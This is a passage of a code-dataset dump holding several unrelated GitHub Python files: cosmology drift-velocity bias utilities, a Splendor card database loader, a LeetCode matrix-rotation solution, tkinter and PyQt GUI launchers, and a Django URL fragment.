self\n","repo_name":"grongier/pyanodi","sub_path":"pyanodi/kernel_k_means.py","file_name":"kernel_k_means.py","file_ext":"py","file_size_in_byte":8393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32044765800","text":"\"\"\"\nUtility functions to include drift velocity in grafIC ics by computing/convolving density\npower spectrum k dependent bias. Contains routines to run CICsASS\n\"\"\"\nimport sys\nimport numpy as np\nfrom py_vbc import run_pyvbc\n\ndef fft_sample_spacing(N, boxsize):\n from cosmology import _fft_sample_spacing\n return _fft_sample_spacing(N, boxsize)\n\n\ndef fft_sample_spacing_components(N):\n from cosmology import _fft_sample_spacing_components\n return _fft_sample_spacing_components(N)\n\ndef vbc_rms(vbc_field):\n '''\n Computes the rms vbc in the box. Do not use for interpolated v_bc\n -- gives too much credance to the unphysical values at the edges\n of the box. Use vbc_med instead.\n '''\n rms = np.sqrt(np.mean(vbc_field ** 2))\n return rms\n\n\ndef vbc_med(vbc_field):\n \"\"\"\n Computes the median vbc in the box. 
Better for interpolated\n (particularly non-periodic) values.\n \"\"\"\n med = np.median(vbc_field)\n\n return med\n\n\ndef vbc_patch_dist(vbc_field, origin):\n import matplotlib.pyplot as plt\n \n nbins = (vbc_field.shape[0] * vbc_field.shape[1] *\n vbc_field.shape[2]) // 4000 # keep ~4000 elements in each bin\n\n rms = np.sqrt(np.mean(vbc_field ** 2))\n rms_cut = np.sqrt(np.mean(vbc_field[vbc_field<50] ** 2))\n med = np.median(vbc_field)\n # rmm = np.sqrt(np.median(vbc_field**2))\n\n fig, ax = plt.subplots(figsize=(6, 6))\n ax.hist(vbc_field.ravel(), bins=nbins, histtype='step')\n ax.axvline(rms, c='r', ls='solid', label='rms')\n ax.axvline(med, c='m', ls='dotted', label='median')\n # ax.axvline(rmm, c='g', ls='dotted', label='rmm')\n ax.axvline(rms_cut, c='saddlebrown', ls='dashed', label='rms $<$ 50 km s$^{{-1}}$ cut')\n ax.set_xlabel('v$_{{\\\\sf bc}}$ (km s$^{{-1}}$)')\n ax.set_ylabel('N')\n ax.legend()\n fig.savefig('vbc_dist_{0}_{1}_{2}.pdf'.format(\n origin[0], origin[1], origin[2]), bbox_inches='tight')\n \n \ndef msg(rank, s, verbose=True):\n if verbose:\n print('[rank {0:03d}]: {1}'.format(rank, s), flush=True)\n else:\n return\n\ndef apply_density_bias(ics, k_bias, b, N, delta_x=None):\n ''' Apply a bias to the realisation's power spectrum, and recompute the 3D field.\n Parameters:\n b (array): bias to deconvolve with the delta_x field, such that:\n delta_x = ifft(delta_k/b)\n '''\n import scipy.fftpack as fft\n import scipy.interpolate as si\n\n if delta_x is None:\n delta_x = ics\n\n # The actual shape of the delta_x region\n shape = delta_x.shape\n # The shape of the symmetric box\n shape0 = (shape[0], shape[0], shape[0])\n\n boxsize = float(ics.boxsize) * \\\n (float(N) / float(ics.N)) # this boxsize is the reduced one\n\n # Always resample k from the (possibly reduced) boxsize, since we may be\n # working on a subregion of the full box\n k = fft_sample_spacing(delta_x.shape[0], boxsize).flatten()\n\n k[k == 0.] = (2. * np.pi) / boxsize\n\n # Interpolate/extrapolate the bias to the 3D grid\n def log_interp1d(xx, yy, kind='linear'):\n logx = np.log10(xx)\n logy = np.log10(yy)\n lin_interp = si.InterpolatedUnivariateSpline(logx, logy)\n log_interp = lambda zz: np.power(10.0, lin_interp(np.log10(zz)))\n return log_interp\n\n f = log_interp1d(k_bias, b)\n b = f(k)\n\n delta_k = fft.fftn(delta_x)\n\n # Apply the bias\n delta_k = delta_k * np.sqrt(b.reshape(delta_k.shape))\n\n # Inverse FFT to compute the realisation\n delta_x = fft.ifftn(delta_k).real.reshape(shape)\n \n return delta_x\n\n\ndef apply_velocity_bias(ics, k_bias, b, N, vel=None):\n \"\"\"\n Calculate the velocity bias. 
Here, the bias has to be vectorised since we \n have vx, vy and vz.\n\n :param ics: \n :param k_bias: \n :param b: \n :param N: \n :param vel: \n :returns: \n :rtype: \n\n \"\"\"\n \n return\n\n\ndef compute_bias(ics, vbc, zstart=1000, kmin=0.1, kmax=10000, n=100, delta=False):\n \"\"\"\n Computes the bias to /both/ density and velocity fields. Assumes\n v_bc is constant at z=zstart.\n\n :param ics: (Snapshot) Snapshot object containing grafic ICs\n\n :param vbc: (array) Array containing the v_bc (i.e. |v_b - v_c|)\n field.\n\n :param zstart: float, redshift of recombination\n :param kmin: float, minimum k-value to solve for in py_vbc\n (Mpc^-1)\n :param kmax: float, maximum k-value to solve for in py_vbc\n (Mpc^-1)\n :param n: int, number of k-values in total if positive, ~number per\n log10(k) if negative\n \"\"\"\n # Compute size of grid and boxsize\n N = vbc.shape[0]\n boxsize = float(ics.boxsize) * (float(N) / float(ics.N))\n\n # v_bc redshifts away, so calculate the v_bc at z=zstart\n z = ics.z\n\n # LC - switched to the median instead, as the rms was giving too\n # extreme values, particularly near the edge in non-periodic\n # interpolated vbc fields\n\n # Also LC: now that I'm actually properly interpolating with yt\n # I'll switch back to using the rms, which gives pretty much the\n # same result as the median now\n \n # rms = vbc_med(vbc)\n rms = vbc_rms(vbc)\n rms_recom = rms * (1. + zstart) / (1. + z)\n\n print(f' v_bc rms {rms:.2f} km/s recom {rms_recom:.2f} km/s')\n \n # Calculate how many samples we need for the requested number per log10(k)\n if (n < 0):\n dlk = np.log10(kmax) - np.log10(kmin)\n n = max([int(np.ceil(np.abs(n) * dlk)), 100])\n \n # Boxsize doesn't make a difference when calculating the power\n # spectra using py_vbc. 
The power spectrum tuple contains (p_c, p_b, p_vc,\n # p_vb) and k is in units of Mpc^-1.\n k, ps_vbc0 = run_pyvbc(vbc=0.0, zstart=zstart, zend=z, dz=3, kmin=kmin,\n kmax=kmax, n=n, delta=delta)\n k, ps_vbcrecom = run_pyvbc(vbc=rms_recom, zstart=zstart, zend=z, dz=3, kmin=kmin,\n kmax=kmax, n=n, delta=delta)\n\n # Calculate the biases\n b_c = ps_vbcrecom[0] / ps_vbc0[0]\n b_b = ps_vbcrecom[1] / ps_vbc0[1]\n b_vc = ps_vbcrecom[2] / ps_vbc0[2]\n b_vb = ps_vbcrecom[3] / ps_vbc0[3]\n\n return k, b_c, b_b, b_vc, b_vb\n\n\ndef cube_positions(ics, n, N=None):\n cubes = []\n if N is None:\n # Beware that ics.n is a tuple and ics.N is an int!\n # N = ics.N\n N = ics.n\n\n # each dimension of the grid must divide evenly into the requested\n # number of cubes\n if np.any(np.mod(N, n) != 0):\n raise Exception('Cannot fit {0} cubes in grid with size {1}'.format(n, N))\n \n dx_cells = N / n\n\n for i in range(int(n[0])):\n cen_i = dx_cells[0] * (i + 0.5)\n\n for j in range(int(n[1])):\n cen_j = dx_cells[1] * (j + 0.5)\n\n for k in range(int(n[2])):\n cen_k = dx_cells[2] * (k + 0.5)\n\n cubes.append([cen_i, cen_j, cen_k])\n\n return cubes, dx_cells\n\n\n# NB: because this function contains a yield it is a generator, so even\n# mode='print' only executes once the generator is iterated\ndef divisors(number, mode='print'):\n n = 1\n while n < number:\n if number % n == 0:\n if mode == 'print':\n print(n)\n elif mode == 'yield':\n yield n\n else:\n pass\n n += 1\n\n\n# Python version of bash which\ndef which(program):\n import os\n\n def is_exe(fpath):\n return os.path.isfile(fpath) and os.access(fpath, os.X_OK)\n\n fpath, fname = os.path.split(program)\n if fpath:\n if is_exe(program):\n return program\n else:\n for path in os.environ[\"PATH\"].split(os.pathsep):\n path = path.strip('\"')\n exe_file = os.path.join(path, program)\n if is_exe(exe_file):\n return exe_file\n\n return None\n\ndef clean(level):\n \"\"\"Clean up after execution has finished. 
Anything that needs to be\n got rid of can be done here.\n \"\"\"\n import shutil\n\n # Remove patches/\n shutil.rmtree('./patches/level_{0:03d}'.format(level))\n \n\n\n# def vbc_ps_fname(rms, z, boxsize):\n# import os\n# cwd = os.getcwd()\n# if not os.path.isdir(\"%s/vbc_TFs_out\" % cwd):\n# os.mkdir(\"%s/vbc_TFs_out\" % cwd)\n# return '%s/vbc_TFs_out/vbc_%f_z%f_B%1.2f.dat' % (cwd, rms, z, boxsize)\n\n\n# def run_cicsass_lc(boxsize, z, rms_vbc_z1000, N=256):\n# import subprocess, os, gc\n\n# exe = which('transfer.x')\n\n# if exe is None:\n# raise Exception(\"Unable to locate transfer.x executable\")\n\n# # Example execution for RMS vbc=30km/s @ z=1000.:\n# # ./transfer.x -B0.2 -N128 -V30 -Z100 -D3 -SinitSB_transfer_out\n\n# CICsASS_home = os.getenv(\"CICSASS_HOME\")\n# if CICsASS_home is None:\n# raise Exception(\"Env var CICSASS_HOME not set\")\n\n# # Run with N=256\n# # CICsASS_home = \"/lustre/scratch/astro/ds381/CICsASS/matt/Dropbox/CICASS/vbc_transfer/\"\n# cmd = 'cd %s && %s -B%1.2f -N%d -V%f -Z%f -D3 -SinitSB_transfer_out' % (\n# CICsASS_home, exe, boxsize, N, rms_vbc_z1000, z)\n# # print 'Running:\\n%s' % cmd\n\n# gc.collect() # Collect garbage\n\n# # Run CICsASS and wait for output, check_output is blocking and\n# # will return an Exception if cmd fails\n# output = subprocess.check_output(cmd, shell=True)\n# output = output.decode(\"ascii\")\n# output = output.splitlines()\n \n# vals = np.zeros(shape=(64, 4))\n\n# # This is slow but perhaps unavoidable\n# for i in range(64):\n# vals[i, :] = output[i].split()\n\n# # Transpose to match original code\n# vals = np.transpose(vals)\n# # and unpack\n# vals = [vals[0, :], vals[1, :], vals[2, :]]\n\n# gc.collect() # Collect garbage\n \n# return vals \n\n\n# def run_cicsass(boxsize, z, rms_vbc_z1000, out_fname, N=256):\n# import subprocess, os\n \n# exe = which('transfer.x')\n\n# if exe is None:\n# raise Exception(\"Unable to locate transfer.x executable\")\n\n# # Example execution for RMS vbc=30km/s @ z=1000.:\n# # ./transfer.x -B0.2 -N128 -V30 -Z100 -D3 -SinitSB_transfer_out\n\n# CICsASS_home = os.getenv(\"CICSASS_HOME\")\n# if CICsASS_home is None:\n# raise Exception(\"Env var CICSASS_HOME not set\")\n\n# # Run with N=256\n# # CICsASS_home = \"/lustre/scratch/astro/ds381/CICsASS/matt/Dropbox/CICASS/vbc_transfer/\"\n# cmd = 'cd %s && %s -B%1.2f -N%d -V%f -Z%f -D3 -Splanck2018_transfer_out > %s' % (\n# CICsASS_home, exe, boxsize, N, rms_vbc_z1000, z, out_fname)\n# # print 'Running:\\n%s' % cmd\n# # Run CICsASS and wait for output\n# code = subprocess.check_call(cmd, shell=True)\n# if code != 0:\n# raise Exception(\"CICsASS returned non-zero exit code: %d\", code)\n# return code\n\n\n# def compute_velocity_bias(ics, vbc):\n# import os, time\n# # print 'AVERAGE INSTEAD OF RMS'\n# # Init fields\n# if vbc is None:\n# vbc = ics['vbc']\n\n# # Compute size of grid and boxsize\n# N = vbc.shape[0]\n# boxsize = float(ics.boxsize) * \\\n# (float(N) / float(ics.N))\n\n# # Compute vbc @ z=1000\n# # vbc_norm = ics.vbc_rms_norm(vbc=vbc)\n# # vbc_rms = vbc_norm * (1001.) 
# vbc_rms prop (1 + z)\n# # Compute vbc @ z=1000\n# z = ics.z\n# rms = vbc_rms(vbc)\n# rms_recom = rms * (1001./(z + 1.0))\n\n# # Check for PS and run CICsASS if necessary\n# fname_vbc0 = vbc_ps_fname(0., z, boxsize)\n# if os.path.isfile(fname_vbc0) is False:\n# exit_code = run_cicsass(boxsize, z, 0., fname_vbc0)\n\n# fname_vbcrecom = vbc_ps_fname(rms_recom, z, boxsize)\n# if os.path.isfile(fname_vbcrecom) is False:\n# exit_code = run_cicsass(boxsize, z, rms_recom, fname_vbcrecom)\n\n# # Load the power spectra and compute the bias\n# # LC - might be too quick for CICASS, check for empty files\n# ps_vbc0 = np.loadtxt(fname_vbc0, unpack=True)\n# ps_vbcrecom = np.loadtxt(fname_vbcrecom, unpack=True)\n# count = 0\n# while ((len(ps_vbc0) == 0) or (len(ps_vbcrecom) == 0)):\n# count += 1\n# if count > 10:\n# raise Exception(\"Reached sleep limit. File still empty.\")\n# print(\"Caught exception (fname_vbc0): {0}\".format(fname_vbc0))\n# print(\"Caught exception (fname_vbcrecom): {0}\".format(fname_vbcrecom))\n# time.sleep(5)\n# ps_vbc0 = np.loadtxt(fname_vbc0, unpack=True)\n# ps_vbcrecom = np.loadtxt(fname_vbcrecom, unpack=True)\n \n# # Should have same lenghts if finished writing\n# count = 0\n# try:\n# while len(ps_vbcrecom[1]) != len(ps_vbc0[1]):\n# count += 1\n# if count > 10:\n# raise Exception(\"Reached sleep limit. Filesizes still differ.\")\n# time.sleep(5)\n# ps_vbc0 = np.loadtxt(fname_vbc0, unpack=True)\n# ps_vbcrecom = np.loadtxt(fname_vbcrecom, unpack=True)\n# except Exception as e:\n# print(\"Caught exception (fname_vbc0): {0}\".format(fname_vbc0))\n# print(\"Caught exception (fname_vbcrecom): {0}\".format(fname_vbcrecom))\n\n# cosmo = ics.cosmo\n\n# import cosmology\n# vdeltab0 = cosmology.linear_velocity_ps(\n# ps_vbc0[0], np.sqrt(ps_vbc0[2]), **cosmo)\n# vdeltab = cosmology.linear_velocity_ps(\n# ps_vbcrecom[0], np.sqrt(ps_vbcrecom[2]), **cosmo)\n\n# vdeltac0 = cosmology.linear_velocity_ps(\n# ps_vbc0[0], np.sqrt(ps_vbc0[1]), **cosmo)\n# vdeltac = cosmology.linear_velocity_ps(\n# ps_vbcrecom[0], np.sqrt(ps_vbcrecom[1]), **cosmo)\n\n# #CDM bias\n# b_cdm = vdeltac / vdeltac0\n# # Baryon bias/p/scratch/chpo22/hpo22i/bd/cicass/vbc_transfer/vbc_TFs_out/vbc_22.435140_z200.000005_B3.52.dat\n# b_b = vdeltab / vdeltab0\n# # Wavenumber\n# k_bias = ps_vbcrecom[0] / ics.cosmo[\"h\"]\n\n# return k_bias, b_cdm, b_b\n\n\n# def compute_velocity_bias_lc(ics, vbc):\n# import os, time\n# # print 'AVERAGE INSTEAD OF RMS'\n# # Init fields\n# if vbc is None:\n# vbc = ics\n\n# # Compute size of grid and boxsize\n# N = vbc.shape[0]\n# boxsize = float(ics.boxsize) * \\\n# (float(N) / float(ics.N))\n\n# # Compute vbc @ z=1000\n# # vbc_norm = ics.vbc_rms_norm(vbc=vbc)\n# # vbc_rms = vbc_norm * (1001.) 
# vbc_rms prop (1 + z)\n# # Compute vbc @ z=1000\n# z = ics.z\n# zstart=1000\n# rms = vbc_rms(vbc)\n# rms_recom = rms * (1001./(1.0 + z))\n\n# ps_vbc0 = run_cicsass_lc(boxsize, z, 0.)\n# ps_vbcrecom = run_cicsass_lc(boxsize, z, rms_recom)\n\n# # Boxsize doesn't make a difference when calculating the power spectra\n# # ps_vbc0 = run_pyvbc(vbc=0.0, zstart=zstart, zend=z, dz=3)\n# # ps_vbcrecom = run_pyvbc(vbc=rms_recom, zstart=zstart, zend=z, dz=3)\n\n# cosmo = ics.cosmo\n\n# import cosmology\n# vdeltab0 = cosmology.linear_velocity_ps(\n# ps_vbc0[0], np.sqrt(ps_vbc0[2]), **cosmo)\n# vdeltab = cosmology.linear_velocity_ps(\n# ps_vbcrecom[0], np.sqrt(ps_vbcrecom[2]), **cosmo)\n\n# vdeltac0 = cosmology.linear_velocity_ps(\n# ps_vbc0[0], np.sqrt(ps_vbc0[1]), **cosmo)\n# vdeltac = cosmology.linear_velocity_ps(\n# ps_vbcrecom[0], np.sqrt(ps_vbcrecom[1]), **cosmo)\n\n# #CDM bias\n# b_cdm = vdeltac / vdeltac0\n# # Baryon bias/p/scratch/chpo22/hpo22i/bd/cicass/vbc_transfer/vbc_TFs_out/vbc_22.435140_z200.000005_B3.52.dat\n# b_b = vdeltab / vdeltab0\n# # Wavenumber\n# k_bias = ps_vbcrecom[0] / ics.cosmo[\"h\"] # \"h Mpc**-1\"\n\n# return k_bias, b_cdm, b_b\n\n\n# def compute_cicsass(ics, vbc):\n# \"\"\"Function used to calculate all the cicass power spectra before\n# doing anything else. Not very efficient, but might be necessary.\"\"\"\n# import os, time\n \n# # Compute size of grid and boxsize (for this patch)\n# N = vbc.shape[0]\n# boxsize = ics.boxsize * (float(N) / float(ics.N)) # \"Mpc a h**-1\" \n\n# # Compute vbc @ z=1000\n# z = ics.z\n# rms = vbc_rms(vbc)\n# rms_recom = rms * (1001./(1.0 + z))\n\n# # Check for PS and run CICsASS if needed\n# fname_vbc0 = vbc_ps_fname(0., z, boxsize)\n# if not os.path.isfile(fname_vbc0):\n# exit_code = run_cicsass(boxsize, z, 0., fname_vbc0)\n\n# fname_vbcrecom = vbc_ps_fname(rms_recom, z, boxsize)\n# if not os.path.isfile(fname_vbcrecom):\n# exit_code = run_cicsass(boxsize, z, rms_recom, fname_vbcrecom)\n\n\n# def compute_bias(ics, vbc):\n# \"\"\" Calculate the bias to the density power spectrum assuming\n# COHERENT vbc at z=1000. \"\"\"\n# import os, time\n \n# # Compute size of grid and boxsize (for this patch)\n# N = vbc.shape[0]\n# boxsize = ics.boxsize * (float(N) / float(ics.N)) # \"Mpc a h**-1\"\n\n# # Compute vbc @ z=1000\n# z = ics.z\n# rms = vbc_rms(vbc)\n# rms_recom = rms * (1001./(1.0 + z))\n\n# # Check for PS and run CICsASS if needed\n# fname_vbc0 = vbc_ps_fname(0., z, boxsize)\n# if not os.path.isfile(fname_vbc0):\n# exit_code = run_cicsass(boxsize, z, 0., fname_vbc0)\n\n# fname_vbcrecom = vbc_ps_fname(rms_recom, z, boxsize)\n# if not os.path.isfile(fname_vbcrecom):\n# exit_code = run_cicsass(boxsize, z, rms_recom, fname_vbcrecom)\n\n# # Load the power spectra and compute the bias\n# # LC - might be too quick for CICASS, check for empty files\n# ps_vbc0 = np.loadtxt(fname_vbc0, unpack=True)\n# ps_vbcrecom = np.loadtxt(fname_vbcrecom, unpack=True)\n# count = 0\n# while ((len(ps_vbc0) == 0) or (len(ps_vbcrecom) == 0)):\n# count += 1\n# if count > 10:\n# raise Exception(\"Reached sleep limit. 
File still empty.\")\n# print(\"Caught exception (fname_vbc0): {0}\".format(fname_vbc0))\n# print(\"Caught exception (fname_vbcrecom): {0}\".format(fname_vbcrecom))\n# time.sleep(5)\n# ps_vbc0 = np.loadtxt(fname_vbc0, unpack=True)\n# ps_vbcrecom = np.loadtxt(fname_vbcrecom, unpack=True)\n\n# # Should have same lenghts if finished writing\n# count = 0\n# try:\n# while len(ps_vbcrecom[1]) != len(ps_vbc0[1]):\n# count += 1\n# if count > 10:\n# raise Exception(\"Reached sleep limit. Filesizes still differ\")\n# time.sleep(5)\n# ps_vbc0 = np.loadtxt(fname_vbc0, unpack=True)\n# ps_vbcrecom = np.loadtxt(fname_vbcrecom, unpack=True)\n# except Exception as e:\n# print(\"Caught exception (fname_vbc0): {0}\".format(fname_vbc0))\n# print(\"Caught exception (fname_vbcrecom): {0}\".format(fname_vbcrecom))\n\n# #CDM bias\n# b_cdm = ps_vbcrecom[1] / ps_vbc0[1]\n# # Baryon bias\n# b_b = ps_vbcrecom[2] / ps_vbc0[2]\n# # Wavenumber\n# k_bias = ps_vbcrecom[0] / ics.cosmo[\"h\"]\n\n# return k_bias, b_cdm, b_b\n\n\n# def compute_bias_lc(ics, vbc):\n# \"\"\" Calculate the bias to the density power spectrum assuming\n# COHERENT vbc at z=1000. \"\"\"\n# import os, time\n \n# # Compute size of grid and boxsize (for this patch)\n# N = vbc.shape[0]\n# boxsize = ics.boxsize * (float(N) / float(ics.N)) # \"Mpc a h**-1\"\n\n# # Compute vbc @ z=1000\n# z = ics.z\n# zstart = 1000\n# rms = vbc_rms(vbc)\n# rms_recom = rms * (1001./(1.0 + z))\n\n# ps_vbc0 = run_cicsass_lc(boxsize, z, 0.)\n# ps_vbcrecom = run_cicsass_lc(boxsize, z, rms_recom)\n \n# # Boxsize doesn't make a difference when calculating the power\n# # spectra using py_vbc\n# # ps_vbc0 = run_pyvbc(vbc=0.0, zstart=zstart, zend=z, dz=3)\n# # ps_vbcrecom = run_pyvbc(vbc=rms_recom, zstart=zstart, zend=z, dz=3)\n\n# #CDM bias\n# b_cdm = ps_vbcrecom[1] / ps_vbc0[1]\n# # Baryon bias\n# b_b = ps_vbcrecom[2] / ps_vbc0[2]\n# # Wavenumber\n# k_bias = ps_vbcrecom[0] / ics.cosmo[\"h\"]# \"h Mpc**-1\"\n \n# return k_bias, b_cdm, b_b\n","repo_name":"lconaboy/drft","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":20637,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"12981911330","text":"__author__ = 'selim'\n\nfrom app.models import Card, Square, colors\nfrom app import db\nimport os\n\ndirpath = os.path.dirname(os.path.abspath(__file__))\n\n\ndef add_cards(rank):\n\n f = open('{}/cards_rank{}.txt'.format(dirpath, rank), 'r')\n\n for line in f:\n card_info = get_card_info(line)\n card = Card(rank=rank,\n color=card_info['color'],\n value=card_info['value'],\n nblack=card_info['nblack'],\n ngreen=card_info['ngreen'],\n nwhite=card_info['nwhite'],\n nred=card_info['nred'],\n nblue=card_info['nblue']\n )\n db.session.add(card)\n db.session.commit()\n\n\ndef add_squares():\n\n f = open('{}/squares.txt'.format(dirpath), 'r')\n\n for line in f:\n square_info = get_square_info(line)\n square = Square(nblack=square_info['nblack'],\n ngreen=square_info['ngreen'],\n nwhite=square_info['nwhite'],\n nred=square_info['nred'],\n nblue=square_info['nblue']\n )\n db.session.add(square)\n db.session.commit()\n\n\ndef get_card_info(line):\n card_info = {'ngreen': 0, 'nwhite': 0, 'nblue': 0, 'nred': 0, 'nblack': 0}\n\n s = line.split(',')\n card_info['color']= s[0]\n\n # Get card value\n card_info['value'] = 0\n if 'point' in s[-1]:\n card_info['value'] = int(s[-1].replace('points', ''))\n tokens = set(s[1:-1])\n else:\n tokens = set(s[1:])\n\n # Needed tokens to buy card\n for token in tokens:\n for 
color in colors:\n if color in token:\n card_info['n{}'.format(color)] = int(token.replace(color, ''))\n\n return card_info\n\n\ndef get_square_info(line):\n square_info = {'ngreen': 0, 'nwhite': 0, 'nblue': 0, 'nred': 0, 'nblack': 0}\n\n tokens = line.split(',')\n\n # Needed tokens to buy card\n for token in tokens:\n for color in colors:\n if color in token:\n square_info['n{}'.format(color)] = int(token.replace(color, ''))\n\n return square_info\n\n\ndef setup_cards_squares():\n for rank in [1, 2, 3]:\n add_cards(rank=rank)\n add_squares()","repo_name":"selimyoussry/splendor","sub_path":"cards_squares_setup/addToDB.py","file_name":"addToDB.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19616406213","text":"# David Lindsey - GISC 6389 - Master's Project\r\n# Contact: dcl160230@utdallas.edu\r\n# The following code represents the functionality for GUI_ApplicationDriver.\r\n\r\nimport tkinter\r\nfrom tkinter import messagebox\r\nfrom GUI_HazardsMenu import HazardsMenu\r\n\r\n# For Python 2.7 consideration:\r\n# import Tkinter as tkinter\r\n# import tkMessageBox as messagebox\r\n\r\n# User-defined parameters for width/height of GUI\r\nguiWindow_HazardMenu_Width = 300\r\nguiWindow_HazardMenu_Height = 150\r\n\r\nclass AppDriver(tkinter.Frame):\r\n\r\n # This class represents the primary Python code that user's will execute\r\n # to drive the entire application.\r\n\r\n def __init__(self, *args, **kwargs):\r\n\r\n tkinter.Frame.__init__(self, *args, **kwargs)\r\n\r\n # Executes HazardsMenu class within the AppDriver\r\n hazMenu = HazardsMenu(self)\r\n hazMenu.grid(column=0, row=0, padx=0, pady=0)\r\n\r\n # Shows the GUI parameters from HazardsMenu within the AppDriver frame.\r\n hazMenu.show()\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # Creates the tkinter GUI window as win.\r\n win = tkinter.Tk()\r\n\r\n # Title of GUI Window\r\n win.title(\"Select Hazard Type\")\r\n\r\n # Pixel width/height of the user's screen\r\n screenWidth = win.winfo_screenwidth()\r\n screenHeight = win.winfo_screenheight()\r\n\r\n # Calculates X/Y start position for the GUI window to appear.\r\n # The following formula will open the GUI window at center of user's screen.\r\n guiWindow_x = (screenWidth / 2) - (guiWindow_HazardMenu_Width / 2)\r\n guiWindow_y = (screenHeight / 3) - (guiWindow_HazardMenu_Height / 3)\r\n\r\n # Geometry parameters for the GUI window.\r\n win.geometry(\"%dx%d+%d+%d\" % (guiWindow_HazardMenu_Width,\r\n guiWindow_HazardMenu_Height, guiWindow_x,\r\n guiWindow_y))\r\n\r\n # GUI Window is locked and non-resizable.\r\n win.resizable(False, False)\r\n\r\n # Execute AppDriver class within the GUI window.\r\n mainGUI = AppDriver(win)\r\n mainGUI.grid(column=0, row=0, padx=0, pady=0)\r\n\r\n # ArcPy module is imported at this location so as to check for any runtime\r\n # errors (due to internet connectivity issues and/or licensing issues).\r\n try:\r\n\r\n import arcpy\r\n\r\n except RuntimeError: # Example: \"Not signed into Portal.\"\r\n\r\n # In the event of a \"Runtime Error\", the user is given an error message.\r\n # The user will be given a choice to continue with the application or\r\n # to exit.\r\n userSelection = messagebox.askyesno(\"Runtime Error Message\",\r\n \"WARNING: Unable to verify ArcGIS licensing.\\n\"\r\n \"As a result, you will not be able to utilize any ArcGIS or ArcPy \"\r\n \"functionality.\\n\"\r\n \"This could be the result of internet connectivity issues or \"\r\n 
\"licensing problems.\\n\\n\"\r\n \"Do you wish to continue running this application?\\n\"\r\n \"Additional, unexpected problems may be encountered if you choose \"\r\n \"to proceed.\")\r\n\r\n if userSelection == True:\r\n\r\n pass\r\n\r\n else:\r\n\r\n exit()\r\n\r\n # Run mainloop to execute/display the GUI.\r\n win.mainloop()","repo_name":"GeoPotato/Python_MastersProject","sub_path":"GUI_ApplicationDriver.py","file_name":"GUI_ApplicationDriver.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32074175507","text":"'''\r\nA\r\nBB\r\nCCC\r\n'''\r\n\r\nn=int(input())\r\ni=1\r\nwhile i<=n:\r\n j=1\r\n start_char=chr(ord('A')+i-1)\r\n while j<=i:\r\n print(chr(ord(start_char)),end='')\r\n j+=1\r\n print()\r\n i+=1","repo_name":"haspdecrypted/Coding-Ninjas-Intro-to-Python---DSA","sub_path":"patterns1/alpha pattern.py","file_name":"alpha pattern.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11974484743","text":"# https://leetcode.com/problems/determine-whether-matrix-can-be-obtained-by-rotation/\n\n\n\"\"\"\nExample 1:\nInput: mat = [[0,1],[1,0]], target = [[1,0],[0,1]]\nOutput: true\nExplanation: We can rotate mat 90 degrees clockwise to make mat equal target.\n\nExample 2:\nInput: mat = [[0,1],[1,1]], target = [[1,0],[0,1]]\nOutput: false\nExplanation: It is impossible to make mat equal to target by rotating mat.\n\nExample 3:\nInput: mat = [[0,0,0],[0,1,0],[1,1,1]], target = [[1,1,1],[0,1,0],[0,0,0]]\nOutput: true\nExplanation: We can rotate mat 90 degrees clockwise two times to make mat equal target.\n\"\"\"\n\n\n# mat, target = [[0,1],[1,0]], [[1,0],[0,1]]\n# mat, target = [[0,1],[1,1]], [[1,0],[0,1]]\nmat, target = [[0,0,0],[0,1,0],[1,1,1]], [[1,1,1],[0,1,0],[0,0,0]]\n# mat, target = [[0,0],[0,1]], [[0,0],[1,0]]\n\n\n\n# Refer to the LeetCode post:\n# https://leetcode.com/problems/determine-whether-matrix-can-be-obtained-by-rotation/discuss/1253880/Python3-rotate-matrix\n# https://stackoverflow.com/questions/8421337/rotating-a-two-dimensional-array-in-python\nfrom typing import List\nclass Solution:\n def findRotation(self, mat: List[List[int]], target: List[List[int]]) -> bool:\n for _ in range(4): \n if mat == target: return True\n # print(mat[::-1])\n mat = [list(x) for x in zip(*mat[::-1])]\n return False\n\n\n# Runtime: 28 ms, faster than 100.00% of Python3 online submissions for Determine Whether Matrix Can Be Obtained By Rotation.\n# Memory Usage: 14.2 MB, less than 50.00% of Python3 online submissions for Determine Whether Matrix Can Be Obtained By Rotation.\n\n\nsolution = Solution()\nprint(solution.findRotation(mat, target))\n\n\n\n","repo_name":"lucliu20/LeetCode-Easy","sub_path":"1886-Determine Whether Matrix Can Be Obtained By Rotation.py","file_name":"1886-Determine Whether Matrix Can Be Obtained By Rotation.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4659247704","text":"# -*- coding: utf-8; -*-\r\n\"\"\"\r\nGui implementation for gui created via qt-designer.\r\n\"\"\"\r\n__author__ = \"Christoph G. Keller\"\r\n__copyright__ = \"Copyright 2017\"\r\n__credits__ = [\"\"]\r\n__license__ = \"MIT\"\r\n__version__ = \"2.0.0\"\r\n__maintainer__ = \"Christoph G. 
Keller\"\r\n__email__ = \"christoph.g.keller@gmail.com\"\r\n__status__ = \"Production\"\r\n\r\n\r\nfrom PyQt5.QtWidgets import QApplication\r\nfrom .wolf_gui_imp import MainWindow\r\n\r\n\r\ndef main():\r\n import sys\r\n app = QApplication(sys.argv)\r\n frame = MainWindow()\r\n frame.show()\r\n app.exec_()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"ckeller42/my_name_is_wolf","sub_path":"my_name_is_wolf/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12606384646","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'scrawls'\nurlpatterns = [\n path('walls', views.CreateWall.as_view(), name='walls-create'),\n path('walls/nearest', views.WallIndex.as_view(), name='walls-nearest'),\n path('walls/<int:pk>', 